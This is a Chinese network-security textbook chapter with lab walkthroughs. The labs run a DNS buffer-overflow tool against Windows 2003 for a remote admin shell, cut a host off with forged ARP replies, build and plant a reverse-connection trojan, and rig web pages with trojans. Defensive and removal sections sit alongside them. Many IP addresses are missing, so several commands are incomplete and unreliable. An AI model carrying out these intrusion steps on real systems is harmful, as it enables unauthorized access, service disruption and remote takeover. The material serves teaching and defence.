第5章 網絡安全技術

第5章網絡安全技術本章學習目標：了解目前網絡的安全形式了解黑客攻擊的步驟掌握常用的網絡命令掌握端口與漏洞掃描工具以及網絡監(jiān)聽工具的使用理解緩沖區(qū)溢出的攻擊原理理解DoS與DDoS攻擊的原理及其防范理解arp欺騙的原理掌握Windows和Linux中防火墻的配置理解入侵檢測與入侵防御技術了解計算機病毒、蠕蟲和木馬帶來的威脅掌握Windows和Linux中VPN的配置掌握httptunnel技術的使用了解蜜罐技術了解無線網絡安全并且會配置無線網絡安全本章學習內容：5.1網絡安全形勢5.2黑客攻擊簡介5.3實例——端口與漏洞掃描及網絡監(jiān)聽5.4緩沖區(qū)溢出5.5DoS與DDoS攻擊檢測與防御5.6arp欺騙5.7防火墻技術5.8入侵檢測技術5.9入侵防御技術5.10計算機傳統(tǒng)病毒5.11蠕蟲病毒5.12特洛伊木馬5.13網頁病毒、網頁掛（木）馬5.14VPN技術5.15實例——httptunnel技術5.16實例：蜜罐技術5.17實例：無線網絡安全配置5.18本章小結5.19習題5.2黑客攻擊簡介

黑客攻擊是當今互聯(lián)網安全的主要的威脅。5.2.1黑客攻擊的目的和手段1．黑客攻擊的目的(1)為了竊取、修改或者刪除系統(tǒng)中的相關信息;(2)為了顯示自己的網絡技術;(3)為了商業(yè)利益;(4)出于政治目的等。2．黑客攻擊的手段黑客攻擊可分為非破壞性攻擊和破壞性攻擊兩類。非破壞性攻擊：一般是為了擾亂系統(tǒng)的運行，并不盜竊系統(tǒng)資料，通常采用拒絕服務攻擊或信息炸彈的方式。破壞性攻擊：是以侵入他人電腦系統(tǒng)、盜竊系統(tǒng)保密信息、破壞目標系統(tǒng)的數(shù)據為目的。黑客常用的攻擊手段有密碼破解、后門程序、電子郵件攻擊、信息炸彈、拒絕服務、網絡監(jiān)聽、利用網絡系統(tǒng)漏洞進行攻擊、暴庫、注入、旁注、Cookie詐騙、WWW的欺騙技術等。5.2.2黑客攻擊的步驟黑客入侵的步驟一般可以分為3個階段：確定目標與收集相關信息、獲得對系統(tǒng)的訪問權力、隱藏蹤跡。黑客入侵的步驟5.2.3黑客入門黑客（Hacker）：是指那些盡力挖掘計算機程序功能最大潛力的計算機用戶，依靠自己掌握的知識幫助系統(tǒng)管理員找出系統(tǒng)中的漏洞并加以完善。駭客（Cracker）：是通過各黑客技術對目標系統(tǒng)進行攻擊、入侵或者做其他一些有害于目標系統(tǒng)或網絡的事情。一些常用的網絡命令：ping、ipconfig、arp、nbtstat、netstat、tracert、net、at、route、nslookup、ftp和telnet。1．pingping是一個用來檢查網絡是否通暢或者網絡連接速度快慢的網絡命令。其目的就是通過發(fā)送特定形式的ICMP包來請求主機的回應，進而獲得主機的一些屬性，用于確定本地主機是否能與另一臺主機交換（發(fā)送與接收）數(shù)據包。

例如:ping20通過ping命令檢測網絡故障的一個典型步驟如下：第1步：ping。如果不能ping通，就表示TCP/IP協(xié)議的安裝或運行存在問題。第2步：ping本機IP。如果不能ping通，就表示本機網絡配置或安裝存在問題。此時，局域網用戶要斷開網絡連接，然后重新ping本機IP。如果網線斷開后能ping通，就表示局域網中的另一臺計算機可能配置了與本機相同的IP地址，造成IP地址沖突。第3步：ping局域網內其他IP。如果不能ping通，表示子網掩碼的設置不正確，或者網卡的配置有問題，或者網絡連線有問題。第4步：ping網關IP。如果能ping通，表示局域網的網關路由器運行正常。第5步：ping遠程IP。如果能ping通，表示默認網關設置正確。第6步：pinglocalhost。localhost是的別名，每臺計算機都應該能夠將localhost解析成。如果不能ping通，說明在主機文件（C:\WINDOWS\system32\drivers\etc\hosts）中存在問題。第7步：ping。如果不能ping通，表示DNS服務器的IP地址配置錯誤，或者DNS服務器發(fā)生了故障。2．ipconfigIpconfig命令用于顯示所有當前的TCP/IP網絡配置值、刷新動態(tài)主機配置協(xié)議(DHCP)和域名系統(tǒng)(DNS)設置。例如：ipconfig用于顯示已經配置的網絡接口的IP地址、子網掩碼、默認網關。例如：Ipconfig/all用于顯示所有網絡接口的詳細網絡參數(shù)設置。例如：ipconfig/release用于將所有網絡接口租用的ip地址歸還給DHCP服務器。例如：ipconfig/renew用于和DHCP服務器取得聯(lián)系，并重新租用一個ip地址。3．arp該命令用于顯示和修改“地址解析協(xié)議(ARP)”緩存中的項目。ARP緩存中包含一個或多個表，它們用于存儲IP地址及其經過解析的以太網或令牌環(huán)物理地址。例如：arp–a用于顯示所有接口的當前ARP緩存表。4．nbtstat該命令用于顯示本地計算機和遠程計算機的基于TCP/IP(NetBT)協(xié)議的NetBIOS統(tǒng)計資料、NetBIOS名稱表和NetBIOS名稱緩存。

例如：nbtstat-a20顯示遠程計算機20的NetBIOS信息。例如：nbtstat-n顯示本地計算機的NetBIOS信息。5．netstat用來顯示計算機上網時與其他計算機之間詳細的連接情況和統(tǒng)計信息（與IP、TCP、UDP和ICMP協(xié)議相關的統(tǒng)計數(shù)據）。netstat命令一般用來檢測本機各端口的網絡連接情況。例如：netstat-a顯示所有連接和監(jiān)聽端口。例如：netstat-e顯示以太網統(tǒng)計信息。例如：netstat-r顯示路由表。6．tracert用來顯示數(shù)據包到達目的主機所經過的每一個路由或網關的IP地址，并顯示到達每個路由或網關所用的時間。例如：tracert20顯示數(shù)據包到達20所經過的每一個路由或網關的IP地址，并顯示到達每個路由或網關所用的時間。tracert7．netnet是一個功能強大的網絡命令（只能在Windows中使用）例如：netview\\53查看遠程主機的所有共享資源。例如：netusex:\\53\lxh把遠程主機53的共享資源lxh映射為本地磁盤X。例如：netshare用來顯示共享資源。例如：netstarttelnet當和遠程主機建立連接后，用來啟動遠程主機上的telnet服務。例如：netstoptelnet當和遠程主機建立連接后，用來關閉遠程主機上的telnet服務。例如：netuser用于查看和帳戶有關的情況，包括新建帳戶、刪除帳戶、查看特定帳戶、激活帳戶、帳戶禁用等。netuserabcd1234/add新建一個用戶名為abcd，密碼為1234的帳戶，默認為user組成員。netuserabcd/active:no將用戶名為abcd的用戶禁用。netuserabcd查看用戶名為abcd的用戶的情況。netuserabcd/active:yes激活用戶名為abcd的用戶。netuserabcd/del將用戶名為abcd的用戶刪除。8．at用于在特定日期或時間執(zhí)行某個命令或程序。nettime\\20可以查看遠程主機當前的時間。at6:55netstarttelnet\\20。在6點55分時，讓ip為20的計算機開啟telnet服務。9．route用于在本地IP路由表中顯示和修改條目。例子1：要顯示IP路由表的完整內容

route

print

例子2：要顯示IP路由表中以10.開始的路由

route

print

10.*

例子3：要添加默認網關地址為的默認路由

route

add

mask

例子4：要添加目標為，子網掩碼為，下一個躍點地址為的路由route

add

mask

例子5：要添加目標為，子網掩碼為，下一個躍點地址為的永久路由route-paddmask例子6：要添加目標為，子網掩碼為，下一個躍點地址為，躍點數(shù)為7的路由routeaddmaskmetric7例子7：要添加目標為，子網掩碼為，下一個躍點地址為，接口索引為0x3的路由routeaddmaskif0x3

例子8：要刪除目標為，子網掩碼為的路由routedeletemask例子9：要刪除IP路由表中以10.開始的所有路由routedelete10.*例子10：要將目標為，子網掩碼為的路由的下一個躍點地址由更改為5routechangemask510．nslookup可以查看遠程主機的IP地址、主機名稱、DNS的IP地址。例如：nslookup用于顯示所使用的Web服務器群的IP地址。11．ftp通過ftp服務登錄到ftp服務器，實現(xiàn)文件上傳、下載、刪除等?！伴_始”-“運行”-輸入ftp2021UsernamePasswordDirPutc:\a.txtGeta.txtDeleltea.txtquit12．telnet如果遠程主機啟動了telnet服務，那么可以使用telnet命令登錄遠程主機（需要用戶名和密碼）。啟動telnet服務：1.計算機名<15個字符；2.執(zhí)行命令：tlntsvr/service例如：telnet20usernamepassword5.2.4黑客工具黑客工具可以分為7大類：信息搜集類、漏洞掃描類、遠程控制類、信息炸彈類、密碼破解類、偽裝類及NetCat。1．信息搜集類監(jiān)聽軟件Analyzer3.0a12，其下載地址為：http://netgroup.polito.it/tools；監(jiān)聽軟件Wireshark，其下載地址為：。監(jiān)聽軟件Analyzer監(jiān)聽軟件Wireshark2．漏洞掃描類（1）掃描器X-Scanner，其下載地址為：/。（2）掃描器Superscan。Superscan是一個功能強大的掃描器，掃描速度非?？?。（3）掃描器流光。是一款國產軟件時，是許多黑客手中必備工具之一。4．信息炸彈類比如郵件炸彈、DoS或DDoS攻擊。5．密碼破解類密碼破解類軟件就是用密碼字典或者窮舉法（暴力破解）來解密文件。6．偽裝類網絡上進行的各種操作如果沒有經過很好的偽裝都會被ISP、服務器記錄下來，然后被反跟蹤技術追查到自己的大概物理位置，為了不被發(fā)現(xiàn)，可以使用這類軟件。7．NetCatNetCat是一個用途廣泛的TCP和UDP連接工具，對系統(tǒng)管理員以及網絡調試人員來說非常有用。不過，NetCat也是一個攻擊網絡的強大工具。5.3實例—端口與漏洞掃描及網絡監(jiān)聽漏洞掃描是對計算機系統(tǒng)或其他網絡設備進行與安全相關的檢測，找出安全隱患和可被黑客利用的漏洞。系統(tǒng)管理員利用漏洞掃描軟件檢測出系統(tǒng)漏洞以便有效地防范黑客入侵，然而黑客可以利用漏洞掃描軟件檢測系統(tǒng)漏洞以利于入侵系統(tǒng)。注意：一個端口就是一扇進入計算機系統(tǒng)的門。1．漏洞掃描與網絡監(jiān)聽掃描與監(jiān)聽的實驗環(huán)境入侵者（85）：運行X-Scan對95進行漏洞掃描。被入侵者（95）：用Analyzer分析進來的數(shù)據包，判斷是否遭到掃描攻擊。第1步：被入侵者(95),開始網絡監(jiān)聽。第2步：入侵者(85)，啟動X-Scan，設置參數(shù)。設置|打描參數(shù)，在指定范圍中輸入95第3步：入侵者(85),進行漏洞掃描。文件|開始掃描第4步：入侵者(85),掃描完成。第5步：被入侵者(95),停止網絡監(jiān)聽。2．漏洞漏洞是指系統(tǒng)硬件或者軟件存在某種形式的安全方面的脆弱性，從而使得攻擊者能夠在未授權的情況下訪問、控制系統(tǒng)。3．端口掃描端口掃描是通過TCP或UDP的連接來判斷目標主機上是否有相關的服務正在運行并且進行監(jiān)聽。比如使用端口掃描器AdvancedPortScanner對某網段進行掃描。5.4.2實例—緩沖區(qū)溢出攻擊及其防范1．實驗環(huán)境入侵者（）：對28進行緩沖區(qū)溢出攻擊。被入侵者（28）：是開啟DNS服務的所有版本的Windows2000Server或Windows2003ServerSP1，在本次測試中使用Windows2003ServerSP1。準備工作:在被入侵者windows2003(28)sp1中安裝DNS、安裝telnet、開啟DNS服務和telnet服務。(1)安裝DNS。開始|設置|控制面板|添加刪除程序|添加刪除windows組件|網絡服務|域名系統(tǒng)(DNS)(2)安裝telnet。先將計算機名稱改為<15個字符；再選開始|運行,輸入cmd,再輸入tlntsvr/service。(3)開啟DNS服務和telnet服務。開始|程序|管理工具|服務|DNSserver和telnet。2．緩沖區(qū)溢出攻擊過程第1步：入侵者下載并且執(zhí)行dns.exe命令。將下載的dns.exe復制到C:\DocumentsandSettings\Administrator，在命令提示符窗口執(zhí)行dns.exe命令。第2步：入侵者尋找漏洞。在命令提示符窗口執(zhí)行dns.exe

-s28命令，對主機進行掃描，顯示出被入侵主機（28）開放的端口以及操作系統(tǒng)，最主要的是顯示“1047:Vulnerability”，意思就是1047端口存在漏洞。第3步：入侵者實施溢出。在命令提示符窗口執(zhí)行dns.exe

-t2003chs281047命令，其中-t2003chs即簡體中文版的2003系統(tǒng)，如果是2000的系統(tǒng)就使用“-2000all”參數(shù)，28就是我們的目標IP地址，1047就是剛才掃描出存在漏洞的端口。出現(xiàn)“Attacksent,checkport1100”字樣，說明已經打開了目標地址的1100端口。第4步：成功入侵。執(zhí)行telnet281100命令，我們現(xiàn)在已經成功地入侵了對方的電腦，并且得到了管理員的權限。第5步：在已經成功入侵的電腦上執(zhí)行簡單的操作。3．緩沖區(qū)溢出攻擊的防范措施（1）關閉不需要的特權程序。（2）及時給系統(tǒng)和服務程序漏洞打補丁。（3）強制寫正確的代碼。（4）通過操作系統(tǒng)使得緩沖區(qū)不可執(zhí)行，從而阻止攻擊者植入攻擊代碼。（5）利用編譯器的邊界檢查來實現(xiàn)緩沖區(qū)的保護，這個方法使得緩沖區(qū)溢出不可能出現(xiàn)，從而完全消除了緩沖區(qū)溢出的威脅，但是代價比較大。（6）在程序指針失效前進行完整性檢查。（7）改進系統(tǒng)內部安全機制。5.5.2DoS與DDoS攻擊什么是DoS與DDoS攻擊？（1）DoS。DoS（DenialofService，拒絕服務）攻擊是通過對主機特定漏洞的利用進行攻擊導致網絡棧失效、系統(tǒng)崩潰、主機死機而無法提供正常的網絡服務功能，從而造成拒絕服務，或者利用合理的服務請求來占用過多的服務器資源（包括網絡帶寬、文件系統(tǒng)空間容量或者網絡連接等），致使服務器超載，最終無法響應其他用戶正常的服務請求。DoS攻擊一般采用一對一的方式。常見的DoS攻擊方式有：死亡之ping（pingofdeath）、TCP全連接攻擊、SYNFlood、SYN/ACKFlood、TearDrop、Land、Smurf、刷Script腳本攻擊、UDP攻擊等。（2）DDoS。DDoS（DistributedDenialofService，分布式拒絕服務）攻擊，又被稱為“洪水式攻擊”，是在DoS攻擊的基礎上產生的一種分布式、協(xié)作式的大規(guī)模拒絕服務攻擊方式。DDoS攻擊策略側重于通過很多“僵尸主機”（被攻擊者入侵過或可間接利用的主機）向受害主機發(fā)送大量看似合法的網絡數(shù)據包，從而造成網絡阻塞或服務器資源耗盡而導致拒絕服務。DDoS的攻擊形式主要有：流量攻擊和資源耗盡攻擊。①流量攻擊：主要是針對網絡帶寬的攻擊，即大量攻擊包導致網絡帶寬被阻塞，合法網絡包被虛假的攻擊包淹沒而無法到達主機。②資源耗盡攻擊：主要是針對服務器主機的攻擊，即通過大量攻擊包導致主機的內存被耗盡或CPU被占完而導致無法提供正常網絡服務。DDoS攻擊采用多對一的方式。常見的DDoS攻擊方式有SYNFlood、ACKFlood、UDPFlood、ICMPFlood、TCPFlood、ConnectionsFlood、ScriptFlood、ProxyFlood等。5.5.3DoS與DDoS攻擊檢測與防范1．拒絕服務攻擊的檢測常用的檢測方法有：使用ping命令檢測，使用netstat命令檢測。（1）使用ping命令檢測。使用ping命令檢測時如果出現(xiàn)超時或者嚴重丟包的現(xiàn)象，則有可能是受到了流量攻擊。如果使用ping命令測試某服務器時基本正常，但無法訪問服務（比如無法打開網頁等），而ping同一交換機上的其他主機正常，則有可能是受到了資源耗盡攻擊。（2）使用netstat命令檢測。在服務器上執(zhí)行netstat-an命令，如果顯示大量的SYN_RECEIVED、TIME_WAIT、FIN_WAIT_1等狀態(tài)，而ESTABLISHED狀態(tài)很少，則可以判定是受到了資源耗盡攻擊。2．拒絕服務攻擊的防范（1）采用高性能的網絡設備。最好采用高性能的網絡設備，并且及時升級主機服務器的硬件配置，尤其是主機和內存，以提高抗拒絕服務攻擊的能力。（2）避免NAT的使用。無論是路由器還是防火墻都要避免使用NAT（網絡地址轉換）。（3）充足的網絡帶寬。網絡帶寬直接決定了網絡能夠承受拒絕服務攻擊的能力。（4）把網站做成靜態(tài)頁面。把網站盡可能做成靜態(tài)頁面，不僅可以提高抗攻擊能力，還能夠增加黑客入侵的難度，比如搜狐、新浪等大型門戶網站主要采用靜態(tài)頁面。（5）增強操作系統(tǒng)的TCP/IP棧。（6）安裝專業(yè)抗DDoS防火墻。（7）采用負載均衡技術。將網站分布在多個主機上，每個主機只提供網站的一部分服務，以避免受攻擊時全部癱瘓。5.6arp欺騙arp欺騙攻擊是通過偽造IP地址和MAC地址實現(xiàn)arp欺騙的攻擊技術。5.6.1實例——arp欺騙1．實驗環(huán)境欺騙者linux（29）。被欺騙者xp（）。2．arp欺騙過程第1步：被欺騙者(xp)可以ping通欺騙者(linux)。被欺騙者xp（）執(zhí)行ping29-n1命令，可以ping通。然后執(zhí)行arp-a命令查看arp緩存，得知欺騙者linux（29）MAC地址為00-0c-29-d5-91-01。欺騙者(linux)可以ping通欺騙者(xp)。欺騙者linux（29）執(zhí)行ping-n1命令，可以ping通。然后執(zhí)行arp-a命令查看arp緩存，得知欺騙者xp（）MAC地址為00:50:56:c0:00:08。第2步：linux對xp進行arp欺騙。欺騙者linux（29）先執(zhí)行ifconfigeth0命令，查看本網卡的MAC地址，然后執(zhí)行./send_arp.o2900:0c:29:d5:91:11

00:50:56:c0:00:081命令，對被欺騙者xp()進行arp欺騙。其中，send_arp.o語法為：send_arp.o源ip地址假mac地址目標ip地址目標mac地址number提示：被欺騙者xp（）MAC地址的獲得可以在欺騙者linux中先執(zhí)行ping命令，然后執(zhí)行arp-a命令查看arp緩存。第3步：被欺騙者(xp)不可以ping通欺騙者(linux)。被欺騙者(xp)先執(zhí)行ping29-n1命令，不可以ping通，再執(zhí)行arp-a命令查看arp緩存，可知29的MAC地址已變。如果本網絡的網關是54，那么想讓00不能訪問互聯(lián)網，就可以執(zhí)行命令./send_arp.o54“假MAC”00“100的MAC”1命令，對00進行arp欺騙。可以每分鐘執(zhí)行一次該命令，00得不到正確的到網關的arp映射表項，就訪問不了互聯(lián)網了。5.6.2arp欺騙的原理與防范1．arp欺騙的原理arp（AddressResolutionProtocol）用來建立IP地址與MAC地址的對應關系。可以通過編程的方式構建arp應答數(shù)據包，然后發(fā)送給被欺騙者，用假的IP地址與MAC地址的映射來更新被欺騙者的arp高速緩存，實現(xiàn)對被欺騙者的arp欺騙。有兩種arp欺騙：一種是對路由器arp高速緩存的欺騙；另一種是對內網電腦arp高速緩存的欺騙。2．arp欺騙攻擊的防范（1）在客戶端使用arp命令綁定網關的IP/MAC（例如arp-s00-e0-eb-81-81-85）。（2）在交換機上做端口與MAC地址的靜態(tài)綁定。（3）在路由器上做IP/MAC地址的靜態(tài)綁定。（4）使用arp服務器定時廣播網段內所有主機的正確IP/MAC映射表。（5）及時升級客戶端的操作系統(tǒng)和應用程序補丁。（6）升級殺毒軟件及其病毒庫。5.7防火墻技術防火墻（FireWall）是一種重要的網絡防護設備，是一種保護計算機網絡、防御網絡入侵的有效機制。1．防火墻的基本原理防火墻是控制從網絡外部訪問本網絡的設備，通常位于內網與Internet的連接處（網絡邊界），充當訪問網絡的唯一入口（出口），用來加強網絡之間訪問控制，防止外部網絡用戶以非法手段通過外部網絡進入內部網絡，訪問內部網絡資源，從而保護內部網絡設備。防火墻根據過濾規(guī)則來判斷是否允許某個訪問請求。2．防火墻的作用防火墻能夠提高網絡整體的安全性，因而給網絡安全帶來了眾多的好處，防火墻的主要作用有：（1）保護易受攻擊的服務。（2）控制對特殊站點的訪問。（3）集中的安全管理。（4）過濾非法用戶，對網絡訪問進行記錄和統(tǒng)計。3．防火墻的基本類型根據防火墻的外在形式可以分為：軟件防火墻、硬件防火墻、主機防火墻、網絡防火墻、Windows防火墻、Linux防火墻等。根據防火墻所采用的技術可以分為：包過濾型、NAT、代理型和監(jiān)測型防火墻等。5.7.2實例—Windows中防火墻配置Windows

XP

SP2中防火墻的設置依次單擊“開始”→“設置”→“控制面板”菜單命令，然后單擊控制面板中的“安全中心”一項，再單擊“Windows防火墻”一項，即可打開Windows防火墻控制臺。（1）“常規(guī)”選項卡設置?！俺Ｒ?guī)”選項卡中有：兩個主選項和一個子選項。①兩個主選項：啟用（推薦）和關閉（不推薦）。②一個子選項：“不允許例外”。如果選擇了“不允許例外”，Windows防火墻將攔截所有的連接用戶計算機的網絡請求，包括在例外選項卡列表中的應用程序和系統(tǒng)服務。另外，防火墻也將攔截文件和打印機共享。默認情況下已選中“啟用（推）”。當Windows防火墻處于打開狀態(tài)時，大部分程序都被阻止通過防火墻。如果想要解除對某一程序的阻止，可以將其添加到“例外”列表（“例外”選項卡）。5.10計算機傳統(tǒng)病毒

1．傳統(tǒng)計算機病毒的定義計算機病毒是一組計算機指令或者程序代碼，能自我復制，通常嵌入在計算機程序中，能夠破壞計算機功能或者毀壞數(shù)據，影響計算機的使用。2．傳統(tǒng)計算機病毒的特性傳統(tǒng)計算機病毒的特性有：可執(zhí)行性、傳染性、潛伏性、可觸發(fā)性和針對性。

3．傳統(tǒng)計算機病毒的分類（1）按計算機病毒攻擊的系統(tǒng)分類，分為：DOS病毒、Windows病毒、UNIX/Linux病毒。具體如表5.20/200所示。（2）按計算機病毒的寄生方式分類，分為：文件型病毒、源碼型病毒、嵌入型病毒、外殼型病毒、操作系統(tǒng)型病毒、引導型病毒、混合型病毒和宏病毒。具體如表5.21/201所示。（3）按計算機病毒的破壞情況分類，分為：良性計算機病毒和惡性計算機病毒。具體如表5.22/201所示。（4）按計算機病毒激活的時間分類，分為：定時和隨機。具體如表5.23/201所示。（5）按計算機病毒傳播媒介分類，分為：單機病毒和網絡病毒。具體如表5.24/202所示。4．傳統(tǒng)計算機病毒傳染的前提條件計算機病毒傳染的前提條件是：計算機系統(tǒng)的運行、磁盤的讀寫。5．目前反病毒的成熟技術目前反病毒的成熟技術是“特征碼查殺”，工作流程是：截獲病毒、分析病毒并且提取特征碼、升級病毒庫。5.11蠕蟲病毒1．蠕蟲病毒的基本概念蠕蟲是計算機病毒的一種，是利用計算機網絡和安全漏洞來復制自身的一小段代碼。蠕蟲代碼可以掃描網絡來查找具有特定安全漏洞的其他計算機，然后利用該安全漏洞獲得計算機的部分或全部控制權并且將自身復制到計算機中，然后又從新的位置開始進行復制。2．網絡蠕蟲和病毒的區(qū)別蠕蟲與病毒的最大不同在于它在沒有人為干預的情況下不斷地進行自我復制和傳播。表5.25/203列出了病毒和蠕蟲的主要區(qū)別。3．蠕蟲的工作流程蠕蟲程序的工作流程可以分為漏洞掃描、攻擊、傳染、現(xiàn)場處理4個階段。4．蠕蟲的行為特征通過對蠕蟲工作流程的分析，歸納出了它的行為特征，分別為:自我繁殖、利用軟件漏洞、造成網絡擁塞、消耗系統(tǒng)資源和留下安全隱患，如表5.26/203所示。5．蠕蟲的危害蠕蟲的危害有兩個方面。（1）蠕蟲大量而快速的復制使得網絡上的掃描數(shù)據包迅速增多，占用大量帶寬，造成網絡擁塞，進而使網絡癱瘓。（2）網絡上存在漏洞的主機被掃描到以后，會被迅速感染，可能造成管理員權限被竊取。6．蠕蟲病毒的一般防治方法使用具有實時監(jiān)控功能的殺毒軟件，不要輕易打開不熟悉電子郵件的附件等。7．“沖擊波”蠕蟲病毒的清除“沖擊波”是一種利用Windows系統(tǒng)的RPC（遠程過程調用）漏洞進行傳播、隨機發(fā)作、破壞力強的蠕蟲病毒?！皼_擊波”中毒癥狀：系統(tǒng)資源緊張，應用程序運行速度異常；網絡速度減慢，用戶不能正常瀏覽網頁或收發(fā)電子郵件；不能進行復制、粘貼操作；Word、Excel、PowerPoint等軟件無法正常運行；系統(tǒng)無故重啟，或在彈出“系統(tǒng)關機”警告提示后自動重啟等（注意：關閉“系統(tǒng)關機”提示框的方法是在出現(xiàn)關機提示時，在“開始”→“運行”中輸入“shutdown–a”命令并執(zhí)行即可）?！皼_擊波”蠕蟲病毒的清除過程如下：第1步：中止進程。在Windows任務管理器的“進程”選項卡中查找msblast.exe（或teekids.exe、penis32.exe），選中它，然后單擊下方的“結束進程”按鈕。提示：也可以在命令提示符窗口執(zhí)行命令：taskkill.exe/immsblast.exe（或taskkill.exe

/imteekids.exe、taskkill.exe/impenis32.exe）。第2步：刪除病毒體。搜索msblast.exe（或teekids.exe、penis32.exe），在“搜索結果”窗口中將找到的文件徹底刪除。提示：在WindowsXP系統(tǒng)中，應首先禁用“系統(tǒng)還原”功能，方法是：右鍵單擊“我的電腦”，選擇“屬性”，在“系統(tǒng)屬性”對話框中選擇“系統(tǒng)還原”選項卡，勾選“在所有驅動器上關閉系統(tǒng)還原”即可。也可以在命令提示符窗口執(zhí)行如下命令：“Del系統(tǒng)盤符\windows\system\msblast.exe”（WindowsXP系統(tǒng)）。第3步：修改注冊表。打開注冊表編輯器，依次找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”，刪除“windowsautoupdate=msblast.exe”（病毒變種可能會有不同的顯示內容）。第4步：重啟計算機。重啟計算機后，“沖擊波”蠕蟲病毒就從系統(tǒng)中完全清除了。5.12特洛伊木馬1．特伊洛木馬的定義在計算機領域，特洛伊木馬只是一個程序，它駐留在目標計算機中，隨計算機啟動而自動啟動，并且在某一端口進行監(jiān)聽，對接收到的數(shù)據進行識別，然后對目標計算機執(zhí)行相應的操作。特洛伊木馬包括兩個部分：被控端和控制端。（1）被控端。又稱服務端，將其植入要控制的計算機系統(tǒng)中，用于記錄用戶的相關信息，比如密碼、賬號等，相當于給遠程計算機系統(tǒng)安裝了一個后門。（2）控制端。又稱客戶端，黑客用來發(fā)出控制命令，比如傳輸文件、屏幕截圖、鍵盤記錄，甚至是格式化硬盤等。2．特伊洛木馬的類型常見的特伊洛木馬有：正向連接木馬和反向連接木馬。（1）正向連接木馬。正向連接木馬是在中木馬者的機器上開個端口，黑客去連接這個端口，前提條件是要知道中木馬者的IP地址。（2）反向連接木馬。反向連接木馬讓中木馬者來連接黑客，不管中木馬者的IP地址如何改變，都能夠被控制。但是，如果黑客的IP地址改變了，中木馬者就不能連接黑客的計算機了，解決該問題的方法是中木馬者通過域名來連接黑客的計算機，只要黑客申請一個域名即可。3．木馬傳播方式（1）利用郵箱傳播木馬。（2）網站主頁掛馬。（3）論壇漏洞掛馬。（4）文件類型偽裝。（5）QQ群發(fā)網頁木馬。（6）圖片木馬、RM木馬、Flash木馬。（7）在Word文檔中加入木馬文件。（8）用BT制作木馬種子。（9）黑客工具中綁定木馬。（10）偽裝成應用程序的擴展組件。5.12.2實例—反向連接木馬的傳播1．實驗環(huán)境2．生成木馬的服務器端第1步：下載并在xp()中安裝灰鴿子。第2步：在xp中配置反向連接木馬。運行灰鴿子，單擊“配置服務程序”，選擇“自動上線設置”選項卡，在IP欄中輸入黑客（客戶端）的IP地址“”，其他配置信息根據界面提示進行設置?！癏KFX2008_OK.exe”是最終生成的反向連接木馬服務器端。3．把木馬服務器端植入他人的電腦(win2003)直接將反向連接木馬服務器端“HKFX2008_OK.exe”復制到被入侵電腦ztg2003（）中。接下來運行HKFX2008_OK.exe，反向連接木馬就會自動進行安裝，首先將自身復制到C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下，然后在注冊表、啟動組、非啟動組中設置好木馬的觸發(fā)條件，這樣木馬的安裝就完成了。注意：木馬的傳播方式主要有兩種。一種是通過電子郵件，控制端將木馬程序以郵件附件的形式發(fā)出去，收信人只要打開附件，系統(tǒng)就會感染木馬。另一種是軟件下載，一些非正規(guī)的網站以提供軟件下載為名義，將木馬捆綁在軟件安裝程序上，下載后，只要一運行這些程序，木馬就會自動安裝。4．黑客進行遠程控制由于是反向連接木馬，所以服務器端上線后就會自動連接客戶端xp（黑客），在主界面中可以看到“ztg2003”已經與黑客電腦連接了，即被黑客控制。在“文件管理器”選項卡中，可以像使用“Windwos資源管理器”一樣來新建、刪除、重命名、下載被入侵電腦中的文件。在“遠程控制命令”選項卡中，可以查看被入侵電腦的系統(tǒng)信息；可以查看、終止被入侵電腦的進程；可以啟動、關閉被入侵電腦的服務等。在“命令廣播”選項卡中，可以向所有被入侵電腦發(fā)送相同的命令。5．手工清除灰鴿子確認灰鴿子的服務進程名稱，假如是“HKFX2008_OK”，右鍵單擊“我的電腦”圖標，選擇“服務”，，禁止“HKFX2008_OK”服務，右鍵單擊該服務，選擇“屬性”，在屬性對話框中得到該服務文件的位置，將其刪除即可。5.12.3實例—查看開放端口判斷木馬木馬通?；赥CP/UDP協(xié)議進行Client端與Server端之間的通訊，因此，木馬會在Server端打開監(jiān)聽端口來等待Client端連接。例如冰河的監(jiān)聽端口是7626。所以，可以通過查看本機開放的端口，來檢查是否被植入了木馬或其他黑客程序。下面使用Windows自帶的netstat命令（Linux也有該命令）查看端口。C:\DocumentsandSettings\Administrator>netstat

-anActiveConnections

ProtoLocalAddressForeignAddressStateTCP:135:0LISTENINGTCP:1038:1039ESTABLISHEDTCP:1039:1038ESTABLISHEDTCP:139:0LISTENINGTCP:1064:80TIME_WAITTCP:1065:80TIME_WAITTCP:7626:0LISTENINGUDP:445*:*UDP:123*:*ActiveConnections：指當前本機活動連接；Proto：連接使用的協(xié)議；LocalAddress：本地計算機的IP地址和連接正在使用的端口號；ForeignAddress：連接該端口的遠程計算機的IP地址和端口號；State：表明TCP連接的狀態(tài)，其中，7626端口正在監(jiān)聽，很有可能被植入了冰河木馬，此時，要立刻斷開網絡，清除木馬。5.13網頁病毒、網頁掛(木)馬網頁病毒、網頁掛（木）馬在新型的病毒大軍中危害面最廣，傳播效果最佳。網頁病毒、網頁掛（木）馬之所以非常流行是因為：他們的技術含量比較低、免費空間和個人網站增多、上網人群的安全意識比較低，另外，國內網頁掛（木）馬大多是針對IE瀏覽器。5.13.1實例—網頁病毒、網頁掛馬1．實驗環(huán)境2．實驗過程第1步：設置IP地址。在Windows2003上，對本臺電腦的網卡設置兩個IP地址，目的是要在本臺電腦上架設基于IP地址（、）的兩個網站。第2步：打開“Internet信息服務（IIS）管理器”。在Windows2003上，打開“Internet信息服務（IIS）管理器”，右鍵單擊“默認網站”選擇右鍵菜單中的“屬性”菜單命令，為本網站選擇的IP地址是。第3步：創(chuàng)建網站。在Windows2003上，右鍵單擊“網站”，依次選擇“新建”和“屬性”菜單命令，開始創(chuàng)建網站。第4步：創(chuàng)建www_muma網站的主目錄。在Windows2003上，在Inetpub文件夾中創(chuàng)建www_muma子文件夾，，該文件夾就是第3步新建網站的主目錄。wwwroot是默認網站的主目錄。第5步：復制網站文件。在Windows2003上，讀者可以將兩個簡單的網站文件分別復制到wwwroot和www_muma文件夾中。編輯wwwroot文件夾中的INDEX.HTM文件，在該文件源代碼的</body>…</body>之間插入如圖所示的被圈部分代碼。第6步：打開瀏覽器。在WindowsXP上，打開瀏覽器（IE或者Firefox），地址欄輸入。注意：圖中左上角的被圈部分，是圖中橢圓部分代碼的效果。第7步：編輯wwwroot中的INDEX.HTM文件。在Windows2003上，編輯C:\Inetpub\wwwroot\INDEX.HTM文件，插入如